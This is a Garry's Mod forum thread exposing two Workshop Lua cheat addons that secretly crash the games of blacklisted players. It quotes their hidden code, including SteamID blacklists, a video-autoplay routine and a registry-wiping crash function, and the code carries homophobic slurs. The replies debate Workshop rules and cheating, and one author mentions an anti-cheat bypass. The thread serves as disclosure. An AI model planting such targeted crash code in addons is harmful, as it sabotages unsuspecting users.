Backdoors in client side cheats on the Workshop! 0_o - Garry's Mod

Ok so the first one is $w4g H4x - [url]http://steamcommunity.com/sharedfiles/filedetails/?id=691929850[/url] Now this addon like the next one have a blacklist for their cheat. However this one opens urls on people and crashes them. [code] -- snip if (swag.Faggots[ply:SteamID64()]) then swag.cookie.Set("Faggot", "lol ima fag") swag.OpenSite() return end --snip function swag.OpenSite() if not (swag.SiteOpen) then local VidLen, VidID = swag.table.Random(swag.VideoIDs) swag.CrashTime = CurTime() + VidLen + 3 swag.SiteOpen = true local HTML = vgui.Create("HTML") HTML:OpenURL("https://www.youtube.com/embed/" .. VidID .. "?autoplay=1") HTML:Dock(FILL) local blocker = vgui.Create("DPanel", HTML) blocker:Dock(FILL) function blocker.Paint() end end end --snip function swag.CrashPlayer() if not (swag.SiteOpen) then return end if (swag.CurTime() > swag.CrashTime) then swag.table.Empty(swag.debug.getregistry()) end end --snip swag.VideoIDs = { ["25IhfWRO4Rk"] = 72, ["q_9SsX7HJhE"] = 51, ["iPXKfGxeHIY"] = 95, ["UocpzSidMgw"] = 32, ["zjEvaYLf68E"] = 15, ["ck5f9LzQmjY"] = 95, ["VAC-5BQnuXI"] = 54, } --snip swag.Faggots = { ["76561198149526614"] = true, -- EnderXenomorphic ["76561198124774917"] = true, -- Splash ["76561198060196166"] = true, -- HAM } [/code] Now the next script is a new one called Bee's Scripts - [url]http://steamcommunity.com/sharedfiles/filedetails/?id=732215911[/url] Now this one only crashes the people on the blacklist but the blacklist is greater. [code] --snip function bee.Crash() bee.table.Empty( bee.debug.getregistry() ) end --snip function bee.IsNope() -- "Nope" list check if ( bee.Nope[ bee.LocalPlayer():SteamID() ] ) then return true else return false end end --snip bee.Nope = { ["STEAM_0:0:17809124"] = true, -- General HeX ["STEAM_0:1:74749901"] = true, -- Tuxy ["STEAM_0:1:45586871"] = true, -- Sackson ["STEAM_0:0:84408790"] = true, -- sp00k/rdude (begs for cheats, zoohcf.pw) ["STEAM_0:1:7339672"] = true, -- Element/dex/d3x ["STEAM_0:1:1910219"] = true, -- Boring ["STEAM_0:0:63518816"] = true, -- phoon (zoohcf.pw) ["STEAM_0:0:89116170"] = true, -- Kran ["STEAM_0:0:9872830"] = true, -- Kran alt ["STEAM_0:1:69705412"] = true, -- Xeaxos ["STEAM_0:1:47904384"] = true, -- John (cheater.team) ["STEAM_0:0:60971854"] = true, -- OJ ["STEAM_0:1:149259235"] = true, -- Mikopy ["STEAM_0:0:94630443"] = true, -- Enderxenomorph/Tapmemer/Meemey ["STEAM_0:0:2678511"] = true, -- Some copy and paster I found on a TTT server ["STEAM_0:1:25429973"] = true, -- Gravko ["STEAM_0:1:26244933"] = true, -- Verideth ["STEAM_0:1:4154719"] = true, -- Dark Byte ["STEAM_0:0:174909898"] = true, -- Dark Byte alt? ["STEAM_0:1:104094210"] = true, -- jumpy ["STEAM_0:0:96933728"] = true, -- Velkon ["STEAM_0:0:177527067"] = true, -- Senator/2cash ["STEAM_0:0:849274"] = true, -- Senator/2cash alt ["STEAM_0:0:47565254"] = true, -- Senator/2cash alt ["STEAM_0:0:56048163"] = true, -- Garry, from Garry's RP ["STEAM_0:0:1690"] = true, -- Nabe ["STEAM_0:0:144398015"] = true, -- Wax ["STEAM_0:1:70711393"] = true, -- gnode ["STEAM_0:1:120338831"] = true, -- Satori ["STEAM_0:0:44427696"] = true, -- Snip ["STEAM_0:0:115343499"] = true, -- Kittix ["STEAM_0:1:157228781"] = true, -- Kittix alt ["STEAM_0:0:80172964"] = true, -- Kuno/Zak the Exploiter ["STEAM_0:1:2325189"] = true, -- Praydog ["STEAM_0:0:5231560"] = true -- Bik } [/code] I am pretty sure this is against the Workshop rules. I'm reporting on it because everyone should be able to use every addon on the Workshop and if you're not cool with that just don't upload your stuff there. Thanks, Hackcraft -- I would have added on to my last post but I didn't think it would get noticed as my reply would be right at the bottom --

Good job on finding these bro. I mean, if we are going to boycott skidcheck we should boycott this shit too (despite the fact they are cheat scripts, which shouldn't even be on the workshop imo) EDIT: After speaking to these script authors, I think it's safe to say their intentions are rather pure, in the sense that they are attempting to disadvantage certain people who choose to steal/claim [afformentioned authors] code as their own. Bee's Scripts' nope table is full of people who would c+p his code, whereas $w4g H4x's faggot list seems to be more targeted at a small handful of people, likely for the same reason. EDIT 2: The author of $w4g H4x has informed me that his list is targeted at individuals that behave with a god complex, perhaps individuals that have personally wronged him in one way or another. Nowhere near the calibre of HeX and his SkidCheck, so I honestly think it's nothing to be concerned about. EDIT 3: Bee T. Gee, the author of Bee's Scripts, chose to get into contact with me via Steam private messaging. I asked if I could share that chat with you, and he agreed. EDIT 4: Updated image with further text that may be of relevance. [t]https://i.sli.mg/TMZTe5.png[/t][t]https://i.sli.mg/vCZRRs.png[/t]

where is the backdoors?

I don't see any backdoors either tbh

backdoor != crashing certain peoples games (imo)

[QUOTE=Jelman;50788739]backdoor != crashing certain peoples games (imo)[/QUOTE] yeah, if it was a backdoor then it possibly would've been more malicious, and would have done it to everyone, not just a single list of people. mine just simply crashes your game if you're on that list and nothing more

[QUOTE=beeteegee;50788755]yeah, if it was a backdoor then it possibly would've been more malicious, and would have done it to everyone, not just a single list of people. mine just simply crashes your game if you're on that list and nothing more[/QUOTE] Still, stopping people from running it is one thing but then crashing their games and opening videos on them is another thing and should be removed from the script.

[QUOTE=Hackcraft;50788786]Still, stopping people from running it is one thing but then crashing their games and opening videos on them is another thing and should be removed from the script.[/QUOTE] Will it shut you up if I replace the crashing with a fake BSoD?

[QUOTE=Hackcraft;50788786]Still, stopping people from running it is one thing but then crashing their games and opening videos on them is another thing and should be removed from the script.[/QUOTE] I disagree. As long as the crash or video provides NO lasting effect on the user once the script is removed, I feel it is perfectly fine. It's when you attempt to be malicious outside the game that it becomes a problem, or malicious at a large scale.

[QUOTE=Moosicorn;50788792]Will it shut you up if I replace the crashing with a fake BSoD?[/QUOTE] Nope, because you shouldn't stop anyone from using your script if you put it on the Workshop. If you don't want certain people to use your script then don't release it to the public.

[QUOTE=Hackcraft;50788786]Still, stopping people from running it is one thing but then crashing their games and opening videos on them is another thing and should be removed from the script.[/QUOTE] it doesn't modify anything in the folder(s), it doesn't make any files, it doesn't remove stuff, it just crashes your session. you can still reload gmod normally, no harm done

This isn't backdooring lmao, but it [i]is[/i] petty as fuck.

Still whether you like it or not, you're breaking the Garry's Mod Workshop rules. "Everyone is allowed to use addons you upload - Steam Workshop is not your personal file hosting, it is a distribution service for your mods and the like. By uploading your addons to Steam Workshop you agree that anyone can download and use your uploaded content, anyone is allowed to edit it (though not redistribute it without your consent, edited or not). You can't say "you are not allowed to use this addon on your server" or similar things. Adding code that would stop people from using your addon on their servers falls into the Malicious Code category." [url]https://wiki.garrysmod.com/page/Steam_Workshop_Rules[/url]

[QUOTE=Redfiend;50788797]I disagree. As long as the crash or video provides NO lasting effect on the user once the script is removed, I feel it is perfectly fine. It's when you attempt to be malicious outside the game that it becomes a problem, or malicious at a large scale.[/QUOTE] Crashing people's games is malicious. How the fuck is it justified to deny someone playing a game by crashing it?

[QUOTE=Hackcraft;50788816]Still whether you like it or not, you're breaking the Garry's Mod Workshop rules. "Everyone is allowed to use addons you upload - Steam Workshop is not your personal file hosting, it is a distribution service for your mods and the like. By uploading your addons to Steam Workshop you agree that anyone can download and use your uploaded content, anyone is allowed to edit it (though not redistribute it without your consent, edited or not). You can't say "you are not allowed to use this addon on your server" or similar things. Adding code that would stop people from using your addon on their servers falls into the Malicious Code category." [url]https://wiki.garrysmod.com/page/Steam_Workshop_Rules[/url][/QUOTE] Putting cheats on the workshop isn't allowed either but I still see Falco's and Lenny's cheats on it. ¯\_(ツ)_/¯

[QUOTE=Moosicorn;50788840]Putting cheats on the workshop isn't allowed either but I still see Falco's and Lenny's cheats on it. ¯\_(ツ)_/¯[/QUOTE] There's noting about not being allowed to put cheats on the Garry's Mod Workshop anywhere so I don't know where you got that from.

[QUOTE=Hackcraft;50788842]There's noting about not being allowed to put cheats on the Garry's Mod Workshop anywhere so I don't know where you got that from.[/QUOTE] [QUOTE=Moosicorn;50788840]Putting cheats on the workshop isn't allowed either but I still see Falco's and Lenny's cheats on it. ¯\_(ツ)_/¯[/QUOTE] Redfiend/Shigbeard stated that, but that was his own opinion about cheats on the workshop.

[QUOTE=Hackcraft;50788816]Still whether you like it or not, you're breaking the Garry's Mod Workshop rules. "Everyone is allowed to use addons you upload - Steam Workshop is not your personal file hosting, it is a distribution service for your mods and the like. By uploading your addons to Steam Workshop you agree that anyone can download and use your uploaded content, anyone is allowed to edit it (though not redistribute it without your consent, edited or not). You can't say "you are not allowed to use this addon on your server" or similar things. Adding code that would stop people from using your addon on their servers falls into the Malicious Code category." [url]https://wiki.garrysmod.com/page/Steam_Workshop_Rules[/url][/QUOTE] Just to add further clarification to anyone who were to initially call BS on this rule, it appears it was added by Robotboy655 at 9:23pm on the 26th of May, 2016, while the exact wording was modified at a later date. It is still of my personal opinion that Bee T. Gee and Moosicorn have done nothing wrong (note, this does not mean they have done nothing petty), however I cannot continue to defend their actions now that I am aware that their actions are in breach of the Garry's Mod Workshop Submission Rules.

[QUOTE=Hackcraft;50788842]There's noting about not being allowed to put cheats on the Garry's Mod Workshop anywhere so I don't know where you got that from.[/QUOTE] The [URL="http://store.steampowered.com/subscriber_agreement/"]Steam Subscriber Agreement[/URL]. [IMG]http://i.imgur.com/iUa0jqj.png[/IMG]

[QUOTE=Moosicorn;50788854]The [URL="http://store.steampowered.com/subscriber_agreement/"]Steam Subscriber Agreement[/URL]. [IMG]http://i.imgur.com/iUa0jqj.png[/IMG][/QUOTE] That's only for VAC detected stuff, not Lua.

[QUOTE=Hackcraft;50788863]That's only for VAC detected stuff, not Lua.[/QUOTE] Actually, the specific wording can apply to any modification to the game. Lua scripts are modifications, and Lua cheats are modifications that may give a player an unfair competitive advantage when playing multiplayer versions of [Garry's Mod]

[QUOTE=Hackcraft;50788863]That's only for VAC detected stuff, not Lua.[/QUOTE] [IMG]http://i.imgur.com/lGOX5SM.png[/IMG] [url]https://wiki.garrysmod.com/page/Steam_Workshop_Rules[/url]

If you want a good LUA cheat just write your own. Sure, backdooring is petty, but having to resort to public cheats and not even checking the source code before running them is even pettier.

[QUOTE=Redfiend;50788872]Actually, the specific wording can apply to any modification to the game. Lua scripts are modifications, and Lua cheats are modifications that may give a player an unfair competitive advantage when playing multiplayer versions of [Garry's Mod][/QUOTE] But in order to do that the server has to allow scripting or you have to use a bypass which is not supplied with the Workshop cheats.

[QUOTE=Hackcraft;50788887]But in order to do that the server has to allow scripting or you have to use a bypass which is not supplied with the Workshop cheats.[/QUOTE] Mine comes with an sv_allowcslua bypass.

[QUOTE=Hackcraft;50788887]But in order to do that the server has to allow scripting or you have to use a bypass which is not supplied with the Workshop cheats.[/QUOTE] Nonetheless it's still a cheat, a modification to the game that provides a competitive advantage to players. It would still fall under the Steam Subscriber Agreement, despite not altering any closed-source part of the game.

Isnt this coming from someone who worked on the backdoored workshop addon darks scripts?

[QUOTE=Moosicorn;50788896]Mine comes with an sv_allowcslua bypass.[/QUOTE] :goodjob:

[QUOTE=Moku;50788943]Isnt this coming from someone who worked on the backdoored workshop addon darks scripts?[/QUOTE] Yes, I coded a bit for it but I wasn't involved with the backdoor, I didn't even know he did it until the addon got taken down. [QUOTE=Redfiend;50788905]Nonetheless it's still a cheat, a modification to the game that provides a competitive advantage to players. It would still fall under the Steam Subscriber Agreement, despite not altering any closed-source part of the game.[/QUOTE] Does that mean Falco's Key remap for playable piano should be taken down as it gives player's using it a musical advantage? Means if they did a face off the one using the script would most likely win! [url]https://steamcommunity.com/sharedfiles/filedetails/?id=266048768[/url]

[QUOTE=Hackcraft;50788967]Yes, I coded a bit for it but I wasn't involved with the backdoor, I didn't even know he did it until the addon got taken down. Does that mean Falco's Key remap for playable piano should be taken down as it gives player's using it a musical advantage? Means if they did a face off the one using the script would most likely win! [url]https://steamcommunity.com/sharedfiles/filedetails/?id=266048768[/url][/QUOTE] No, as it doesn't provide a competitive advantage. Instead, it's an assisting tool. I'd say the same about a tool I found a while ago that displayed a visual radar on screen for where sounds were coming from in a 2d environment.